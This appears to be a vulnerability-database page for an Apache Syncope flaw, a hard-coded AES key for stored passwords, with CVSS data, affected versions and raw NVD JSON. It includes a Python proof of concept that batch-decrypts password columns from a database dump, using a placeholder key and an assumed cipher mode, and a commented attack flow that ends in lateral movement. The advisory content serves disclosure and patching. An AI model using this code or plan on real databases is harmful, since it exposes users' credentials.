Security Vulnerability Report
CVE-2025-65998 CVSS 7.5 HIGH

CVE-2025-65998

Published: 2025-11-24 14:15:48
Last Modified: 2025-11-26 14:30:27

Description

Apache Syncope can be configured to store user password values in its internal database with AES encryption; this is not the default option. When AES is configured, the default key value hard-coded in the source code is always used, regardless of what the deployment configures. An attacker who obtains the contents of the internal database (for example from a dump or backup) can therefore reconstruct the original cleartext password values, because the key is effectively public. Encrypted plain attributes, whose values are also stored with AES encryption, are not affected. Users are recommended to upgrade to version 3.0.15 / 4.0.3, which fix this issue. Note for responders: any copy of the database taken while a vulnerable version was in use stays decryptable with the hard-coded key after the upgrade, so passwords stored under it should be treated as exposed and rotated.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:syncope:*:*:*:*:*:*:*:* - VULNERABLE (versions 2.1.0 through 2.1.14, inclusive)
cpe:2.3:a:apache:syncope:*:*:*:*:*:*:*:* - VULNERABLE (versions 3.0.0 up to, but excluding, 3.0.15)
cpe:2.3:a:apache:syncope:*:*:*:*:*:*:*:* - VULNERABLE (versions 4.0.0 up to, but excluding, 4.0.3)
Apache Syncope 2.1.0 - 2.1.14 (no fixed 2.1.x release is listed; the advisory points to 3.0.15 / 4.0.3)
Apache Syncope 3.0.x < 3.0.15
Apache Syncope 4.0.x < 4.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import base64

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

# Hard-coded AES key from the Apache Syncope source code.
# Placeholder: replace with the actual hard-coded key (must be 16, 24 or 32 bytes).
AES_KEY = b'YourHardcodedKeyHere123456789012'


def decrypt_password(encrypted_password_b64):
    """Decrypt an AES-encrypted password value using the hard-coded key.

    Assumes AES-CBC with the IV stored in the first 16 bytes of the blob;
    the advisory does not state the mode or IV layout, so adjust this to
    match the Syncope version under test.
    """
    try:
        encrypted_data = base64.b64decode(encrypted_password_b64)
        iv = encrypted_data[:16]
        ciphertext = encrypted_data[16:]
        cipher = AES.new(AES_KEY, AES.MODE_CBC, iv)
        decrypted = unpad(cipher.decrypt(ciphertext), AES.block_size)
        return decrypted.decode('utf-8')
    except Exception as e:
        return f"Decryption failed: {str(e)}"


# Example: batch decryption of rows pulled from a database dump
def extract_and_decrypt(db_passwords):
    """Decrypt the password column of rows extracted from the database."""
    results = []
    for row in db_passwords:
        username = row['username']
        encrypted_pwd = row['password']
        decrypted_pwd = decrypt_password(encrypted_pwd)
        results.append({'username': username, 'password': decrypted_pwd})
    return results


# Example attack flow
# 1. Obtain access to the internal database
# 2. Extract the (encrypted) password column
# 3. Batch-decrypt it with this script
# 4. Use the recovered credentials for lateral movement

References

https://lists.apache.org/thread/fjh0tb0d1xkbphc5ogdsc348ppz88cts (Mailing List, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2025/11/24/1 (Mailing List, Third Party Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-65998",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-24T14:15:48.417",
    "lastModified": "2025-11-26T14:30:26.730",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Apache Syncope can be configured to store the user password values in the internal database with AES encryption, though this is not the default option.\n\nWhen AES is configured, the default key value, hard-coded in the source code, is always used. This allows a malicious attacker, once obtained access to the internal database content, to reconstruct the original cleartext password values.\nThis is not affecting encrypted plain attributes, whose values are also stored using AES encryption.\n\nUsers are recommended to upgrade to version 3.0.15 / 4.0.3, which fix this issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-321"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:syncope:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "2.1.0",
                "versionEndIncluding": "2.1.14",
                "matchCriteriaId": "D773E581-822F-4431-BEFB-48BE61A743EC"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:syncope:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "3.0.0",
                "versionEndExcluding": "3.0.15",
                "matchCriteriaId": "DE40E959-C93C-43E0-80AE-4FAB31C47165"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:syncope:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.0.0",
                "versionEndExcluding": "4.0.3",
                "matchCriteriaId": "EFD9390D-0F3F-453D-ACCC-BFF74C6D9623"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://lists.apache.org/thread/fjh0tb0d1xkbphc5ogdsc348ppz88cts",
        "source": "[email protected]",
        "tags": ["Mailing List", "Vendor Advisory"]
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2025/11/24/1",
        "source": "af854a3a-2127-422b-91ae-364da2661108",
        "tags": ["Mailing List", "Third Party Advisory"]
      }
    ]
  }
}